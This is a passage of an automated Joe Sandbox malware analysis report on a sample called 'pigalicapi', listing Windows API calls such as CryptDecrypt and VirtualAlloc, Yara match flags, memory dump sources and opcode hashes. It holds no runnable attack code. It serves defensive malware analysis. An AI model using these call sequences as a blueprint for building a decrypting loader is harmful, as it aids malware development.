                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                                                          • Opcode ID: 18566d6f1c4bcdf40f941eaa2943ab56f92772dce97a9aa0eebb820b0fbeff19
                                                                                                                                                                                                                                                          • Instruction ID: 33c1c6c8f84194f660e927d7ba0ac7bc1f2fdc96c996655d2934d5970699a2ae
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18566d6f1c4bcdf40f941eaa2943ab56f92772dce97a9aa0eebb820b0fbeff19
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4111C74A01209EBDF15CF94C848BEEB7B5FB58704F10C558E9149B280D7B49A95CB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0056C807
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056C840
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0056C847
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2716640707-0
                                                                                                                                                                                                                                                          • Opcode ID: 86f870cff867b8a8483327674440e153490c5c6d5b376dd6faded2ee0d8f0c02
                                                                                                                                                                                                                                                          • Instruction ID: de6c16a377568b450f3d104370aaa43810f2c1f773dd0d14fcc22235efb173d0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86f870cff867b8a8483327674440e153490c5c6d5b376dd6faded2ee0d8f0c02
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E09B3B5045166A923132297C4DD7F2E1DFFD27B1B150129F54897152EE208D06A5F2
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A180D8
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A18240
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A18AD3
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: GetLastError.KERNEL32 ref: 00A18ADD
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A18B0C
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 00A18B37
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A18B5E
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00A18B7A
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptDestroyKey.ADVAPI32(00000000), ref: 00A18B87
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptDestroyKey.ADVAPI32(00000000), ref: 00A18B91
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A18B9D
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00A181F1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 142027497-0
                                                                                                                                                                                                                                                          • Opcode ID: 29d075aea3f47c081fabd673ccd2807d9d8e8e3244f55f5eac139c5f7641bfc4
                                                                                                                                                                                                                                                          • Instruction ID: 77a3b41d03a189a14c25d74132532fa4cb8ccd42fb96ca9a3393f6536f7d315b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29d075aea3f47c081fabd673ccd2807d9d8e8e3244f55f5eac139c5f7641bfc4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3951E6B4E00209EFDB14DF98D995BEEB7B5BB48304F148159E915BB381D734AA80CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Info
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: 71f71b1f61908623cf9260c1bd3526a8a4f2fbc01f234157e71b1177cfc93a99
                                                                                                                                                                                                                                                          • Instruction ID: 3a35b8575280d71a677424eeb461310cfc6a576a8d1edd5a705fa9ea89f60821
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71f71b1f61908623cf9260c1bd3526a8a4f2fbc01f234157e71b1177cfc93a99
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55411A7050839C9ADF218E28CC88AF6BFB9FB45318F1409EDE59A87143D6359A49DF60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CharUpperA.USER32(00000000), ref: 00A159E2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyz, xrefs: 00A1597E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CharUpper
                                                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                          • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                          • Opcode ID: df06399a4873d62630f3a5326e72a19377fec94c8fb5506d63f82eee6a98d3d6
                                                                                                                                                                                                                                                          • Instruction ID: 4b035326fc0a5b7c0a1ebb1875cf78bc4eeed474fb089241448341d1007d9412
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df06399a4873d62630f3a5326e72a19377fec94c8fb5506d63f82eee6a98d3d6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61213A31906108EBCF04CF98D984BEEBBB6FF85325F248556F8046B340D3759A85CB41
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,005662C1,00000000,?,00566A99,00000001,00000364,?,005662C1,00565E2D), ref: 005673A0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID: -^V
                                                                                                                                                                                                                                                          • API String ID: 1279760036-1776584890
                                                                                                                                                                                                                                                          • Opcode ID: 0776990fb05ce37ace15dbc7483635a3006bec5ba4500cd76e6875a36e20ca8d
                                                                                                                                                                                                                                                          • Instruction ID: ecbcd52791f1d4be73567ee03801304fdec0a5c2aed7d2a748494abf2e86635e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0776990fb05ce37ace15dbc7483635a3006bec5ba4500cd76e6875a36e20ca8d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7F0893170952DABDB216F659C0AB6B3F49FF99764B148A51AC14D7391DE30DC00B6E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00567EB2: GetOEMCP.KERNEL32 ref: 00567EDD
                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00568180,?,00000000), ref: 00568353
                                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00568180,?,?,?,00568180,?,00000000), ref: 00568366
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                                                                                                          • Opcode ID: e263c6cce63e95c8aad32999da1a0a776a7b79230e622617ed5927a3f5e30af4
                                                                                                                                                                                                                                                          • Instruction ID: d0545903c99ab22529c1c21a21f9c56c609c61b907406ff8b048f753f6fde79f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e263c6cce63e95c8aad32999da1a0a776a7b79230e622617ed5927a3f5e30af4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20512570E042069FDB21CF75C8846BBBFE5FF45308F184AAED4968B291DE359946CB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A18BFF
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: GetLastError.KERNEL32 ref: 00A18C09
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A18C38
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00A18C59
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00A18C71
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 00A18C99
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00A18CC1
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 00A18CD5
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A18CE1
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00A19513
                                                                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 00A19521
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2710640451-0
                                                                                                                                                                                                                                                          • Opcode ID: 7d2145e29b71a4cb5b5b86d8d013a808a19c76aa3fa0aea81a21fff72d04b6e4
                                                                                                                                                                                                                                                          • Instruction ID: 5590b62f3dcc0a4443d317a55609e37e6ee2a2e60cc345c1e08d2d21273e935a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d2145e29b71a4cb5b5b86d8d013a808a19c76aa3fa0aea81a21fff72d04b6e4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02412BB1D00208EFDB04DFD4C991BEEBBB5EF58304F108159E515AB281E734AA89CB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 005669E4: GetLastError.KERNEL32 ref: 005669E8
                                                                                                                                                                                                                                                            • Part of subcall function 005669E4: _free.LIBCMT ref: 00566A1B
                                                                                                                                                                                                                                                            • Part of subcall function 005669E4: SetLastError.KERNEL32(00000000), ref: 00566A5C
                                                                                                                                                                                                                                                            • Part of subcall function 005669E4: _abort.LIBCMT ref: 00566A62
                                                                                                                                                                                                                                                            • Part of subcall function 0056823D: _abort.LIBCMT ref: 0056826F
                                                                                                                                                                                                                                                            • Part of subcall function 0056823D: _free.LIBCMT ref: 005682A3
                                                                                                                                                                                                                                                            • Part of subcall function 00567EB2: GetOEMCP.KERNEL32 ref: 00567EDD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00568196
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005681CC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2991157371-0
                                                                                                                                                                                                                                                          • Opcode ID: cada009cfb1eb4462244b1a8b15306be605b83c46762c7c6cea62446e4da196a
                                                                                                                                                                                                                                                          • Instruction ID: a9fe874127dc282047295b78c33b1a1622f43bc3902decb8c9c0f6ccd2b6721c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cada009cfb1eb4462244b1a8b15306be605b83c46762c7c6cea62446e4da196a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E31F631908209AFDB10DBA8D845BADBFF5FF86324F214299E9149B2A1EF319D41CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 00A14C19
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00A14C49
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00A14C60
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00A14C77
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00A156F0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual$ObjectSingleUninitializeWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2825510553-0
                                                                                                                                                                                                                                                          • Opcode ID: 3dac3d765a3cd845b34733f2fe5c60cfb5d3c9de731683b61b9ea73a5dbf268a
                                                                                                                                                                                                                                                          • Instruction ID: 075e4b56780523ccfe31b9c0c0fb35fc13558092c258c931757a26e234a98e65
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dac3d765a3cd845b34733f2fe5c60cfb5d3c9de731683b61b9ea73a5dbf268a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E0C971A402059BC700CFE4D890AEEBBB5EF5C325F54865AE801AA241D631E891DBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A197CF
                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00A197D6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                          • Opcode ID: a958375385e7fd1e91b9d335db121a583536ef135daea7b06bb6542bc585a453
                                                                                                                                                                                                                                                          • Instruction ID: e64a9b34c68ec98e5c6669435bcdf1593561ba2dccf1bb30bcb4cb725ef0c30b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a958375385e7fd1e91b9d335db121a583536ef135daea7b06bb6542bc585a453
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19C01279080208EFDB00DFD4E90CBEA3BACAB08316F048001BA0C8A4A1C6709981CBA2
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00A19FB2,?,00A19FB2,00000000,?,?,?,00A19E2D), ref: 00A197A9
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00A19FB2,00000000,?,?,?,00A19E2D), ref: 00A197B0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                                                          • Opcode ID: abaa7473094b48e07cf439a76dd5039c70b2fb5022e01b68ba7009c9c892991a
                                                                                                                                                                                                                                                          • Instruction ID: 85821ecaaa10fd2a6a0c19b4151100169bc611f1af75e41cd84a4ab9a2df9f81
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abaa7473094b48e07cf439a76dd5039c70b2fb5022e01b68ba7009c9c892991a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DC09B75180308EFD640DBD8ED0DFD5375DE74C611F008001B70DC6155CA70A5454762
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 0056735F: RtlAllocateHeap.NTDLL(00000008,005662C1,00000000,?,00566A99,00000001,00000364,?,005662C1,00565E2D), ref: 005673A0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056C8BF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                                                                                                          • Opcode ID: 801be9e56227785b6449ea9febabb7cb39a789cae8e42810a6ad1fd83e2ba0bf
                                                                                                                                                                                                                                                          • Instruction ID: 2544d5cd2aa153d14f7689439b0e616ba2eacd4c49f8e7e588443d2a7020e20c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 801be9e56227785b6449ea9febabb7cb39a789cae8e42810a6ad1fd83e2ba0bf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6101D6726043096BE3318E69D88596AFFD9FB89370F250A2DE5D493280EA30A805C774
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,0056815B,00000220), ref: 005692A5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: 2a9f4ab3f8f039540cdab237ecb567980c627f6e7b0fdfee44fe8d8ab927c3f7
                                                                                                                                                                                                                                                          • Instruction ID: 998dcd20e156463a1b96b71427c8e87998eba5d44a1f04cd67317c9506cc786e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a9f4ab3f8f039540cdab237ecb567980c627f6e7b0fdfee44fe8d8ab927c3f7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36E065391052227BDF2126655C297AB3F8CBB827A4F550251EC15A7195CF71CC4091E4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
